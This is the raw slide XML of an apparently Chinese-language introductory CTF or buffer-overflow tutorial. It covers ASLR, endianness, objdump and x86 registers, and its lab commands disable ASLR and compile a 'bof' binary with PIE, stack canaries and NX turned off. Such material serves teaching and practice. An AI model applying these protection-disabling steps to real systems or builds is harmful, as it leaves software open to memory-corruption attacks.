          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5130539" y="3166216"/>
            <a:ext cx="7231249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72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ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="動態記憶體位址，程式每次執行時皆會分配到random的記憶體位址"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105183" y="4206792"/>
            <a:ext cx="1354153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動態記憶體位址，程式每次執行時皆會分配到random的記憶體位址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="root@CTF : tmp ➤ cat /proc/sys/kernel/randomize_va_space…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132048" y="5057161"/>
            <a:ext cx="14134069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CTF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cat /proc/sys/kernel/randomize_va_space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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="194" name="Screen Shot 2019-04-11 at 3.49.44 PM.png" descr="Screen Shot 2019-04-11 at 3.49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984" y="802004"/>
            <a:ext cx="16306060" cy="6015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 Shot 2019-04-11 at 3.49.59 PM.png" descr="Screen Shot 2019-04-11 at 3.49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2620" y="3968318"/>
            <a:ext cx="16306060" cy="5779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 Shot 2019-04-11 at 3.50.10 PM.png" descr="Screen Shot 2019-04-11 at 3.50.1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09741" y="7237858"/>
            <a:ext cx="16306060" cy="5824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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="194" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="195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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23304500" y="12909221"/>
            <a:ext cx="478070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99" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22872022" y="56482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0" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3175" y="-369"/>
            <a:ext cx="24377651" cy="65559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Rectangle 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5130800" y="8467210"/>
            <a:ext cx="7231248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72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Disable ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="root@CTF : tmp ➤ echo &quot;0&quot; &gt; /proc/sys/kernel/randomize_va_space"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5130800" y="9695531"/>
            <a:ext cx="1584122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CTF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echo "0" &gt; /proc/sys/kernel/randomize_va_space </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="203" name="Screen Shot 2019-04-11 at 3.56.28 PM.png" descr="Screen Shot 2019-04-11 at 3.56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407" y="807851"/>
            <a:ext cx="16989291" cy="6314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 Shot 2019-04-11 at 3.56.36 PM.png" descr="Screen Shot 2019-04-11 at 3.56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7987" y="4261393"/>
            <a:ext cx="16995326" cy="6314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creen Shot 2019-04-11 at 3.56.20 PM.png" descr="Screen Shot 2019-04-11 at 3.56.2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4078" y="7236045"/>
            <a:ext cx="16995326" cy="6358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  <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="205" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="204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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23301109" y="56482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8" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3176" y="7162800"/>
            <a:ext cx="24377651" cy="65559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root@Ubuntu : tmp ➤ gcc -o bof bof.c -no-pie -fno-stack-protector -z execstack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2435939" y="6570980"/>
            <a:ext cx="1949942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gcc -o bof bof.c -no-pie -fno-stack-protector -z execstack </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="12439650" y="7287086"/>
            <a:ext cx="1" cy="726441"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="127000">
            <a:solidFill>
              <a:srgbClr val="FF26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15838931" y="5888007"/>
            <a:ext cx="1" cy="726441"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="127000">
            <a:solidFill>
              <a:srgbClr val="FF26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 flipV="1">
            <a:off x="20484275" y="7287086"/>
            <a:ext cx="1" cy="726441"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="127000">
            <a:solidFill>
              <a:srgbClr val="FF26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取消pie"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11625319" y="7970059"/>
            <a:ext cx="162866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取消pie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="取消NX"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19657443" y="7970059"/>
            <a:ext cx="165366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取消NX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="取消Canary"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14592738" y="5208017"/>
            <a:ext cx="249238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取消Canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="216" name="Screen Shot 2019-04-11 at 3.34.54 PM.png" descr="Screen Shot 2019-04-11 at 3.34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6966" y="9521538"/>
            <a:ext cx="16503844" cy="3547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creen Shot 2019-04-11 at 3.36.53 PM.png" descr="Screen Shot 2019-04-11 at 3.36.5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9442" y="905370"/>
            <a:ext cx="18356216" cy="3776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 Shot 2019-04-11 at 3.29.23 PM.png" descr="Screen Shot 2019-04-11 at 3.29.2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1131" y="5069570"/>
            <a:ext cx="16558004" cy="4064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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="217" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="216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Know How"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8839207" y="6075679"/>
            <a:ext cx="6692886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Know How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Endianness"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5268179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Endianness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="一個值存放於Memory的排序方式…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="9541521" cy="241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一個值存放於Memory的排序方式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Big Endinness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Little Endinness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="If a value is 0xa1b2c3d4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8846264" y="5120991"/>
            <a:ext cx="6678772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pPr/>
            <a:r>
              <a:t>If a value is 0xa1b2c3d4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10591547" y="7220029"/>
            <a:ext cx="2498962" cy="127000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6" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13077490" y="7220029"/>
            <a:ext cx="2498962" cy="127000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7" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15563432" y="7220029"/>
            <a:ext cx="2498963" cy="127000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8" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18057223" y="7220029"/>
            <a:ext cx="2498962" cy="127000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9" name="0xa1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11369709" y="753626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0xa1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="0xb2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13779191" y="7536260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0xb2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="低"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9959177" y="7491810"/>
            <a:ext cx="5613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低</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="高"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20713904" y="7491810"/>
            <a:ext cx="5613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高</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10591547" y="10262577"/>
            <a:ext cx="2498962" cy="127000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4" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13077490" y="10262577"/>
            <a:ext cx="2498962" cy="127000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5" name="0xd4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11369708" y="10578806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0xd4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="0xc3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13792027" y="10578806"/>
            <a:ext cx="10698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0xc3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="0xb2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16265134" y="10578806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0xb2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="0xa1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18758924" y="10578806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0xa1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="低"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9959177" y="10534356"/>
            <a:ext cx="5613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低</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="高"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20713904" y="10534356"/>
            <a:ext cx="5613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高</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Big Endinness"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3104347" y="7441010"/>
            <a:ext cx="400135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pPr/>
            <a:r>
              <a:t>Big Endinness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Little Endinness"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3096055" y="10483556"/>
            <a:ext cx="440795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pPr/>
            <a:r>
              <a:t>Little Endinness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15575860" y="10262577"/>
            <a:ext cx="2498962" cy="127000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Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18095050" y="10262577"/>
            <a:ext cx="2498962" cy="127000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5" name="0xc3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16277970" y="7536260"/>
            <a:ext cx="10698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0xc3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="0xd4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18758924" y="7536260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0xd4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247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Objdump"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="4151968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Objdump</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="#include &lt;stdio.h&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2374786" y="4464580"/>
            <a:ext cx="7121967" cy="791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4800">
                <a:solidFill>
                  <a:srgbClr val="669900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90055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0077AA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800"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sz="4800">
                <a:solidFill>
                  <a:srgbClr val="0077AA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DD4A68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(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a</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,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b</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>){</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800"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int</a:t>
            </a:r>
            <a:r>
              <a:t> tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="9A6E3A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="9A6E3A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800"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char</a:t>
            </a:r>
            <a:r>
              <a:t> buf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="0077AA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tmp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defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="9999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defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="DD4A68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77AA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t>main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0077AA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>){</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800"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D4A68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f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990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="0077AA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0055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0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defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="9999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51" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12338867" y="4324880"/>
            <a:ext cx="9854132" cy="819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080483db &lt;f&gt;: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483e4:	8b 45 0c             	mov    0xc(%ebp),%eax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80483e7:	01 d0                	add    %edx,%eax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80483e9:	89 45 fc             	mov    %eax,-0x4(%ebp)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80483ec:	8b 45 fc             	mov    -0x4(%ebp),%eax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80483ef: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80483f0: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080483f1 &lt;main&gt;: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80483f1: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80483f2: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80483f4:	6a 02                	push   $0x2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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Arrow"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10141832" y="7785412"/>
            <a:ext cx="1549339" cy="1272977"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32000"/>
              <a:gd name="adj2" fmla="val 49845"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumOff val="-10627"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumOff val="-10627"/>
              </a:scheme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3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54" name="Decompiler…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="9168855" cy="241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Decompiler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將編譯好的二進位檔用組語顯示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objdump -S ./binary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gister"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="3852824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Register</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="暫存器…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="8389889" cy="17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暫存器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程式運算時用來存放值的地方</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="EDI, ESI…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3785363" y="4915351"/>
            <a:ext cx="5218173" cy="644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EDI, ESI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    索引暫存器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ESP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    堆疊指標暫存器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EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    基底指標暫存器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EIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    指令指標暫存器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="EAX…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12472163" y="4915351"/>
            <a:ext cx="3998973" cy="644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EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    累積暫存器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EBX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    基底暫存器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ECX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    計數暫存器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EDX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    資料暫存器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260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WHOAMI"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9392352" y="6075679"/>
            <a:ext cx="5586597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WHOAMI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gister"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="3852824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Register</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="暫存器…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="8389889" cy="17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暫存器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程式運算時用來存放值的地方</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="EDI, ESI…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3785363" y="4915351"/>
            <a:ext cx="6877607" cy="644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EDI, ESI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    索引暫存器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>ESP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    存放當前stack頂指標</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    存放當前stack底指標</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>EIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    當前程式執行到的位址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="EAX…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12472163" y="4915351"/>
            <a:ext cx="3998973" cy="644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EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    累積暫存器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EBX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    基底暫存器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ECX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    計數暫存器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EDX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
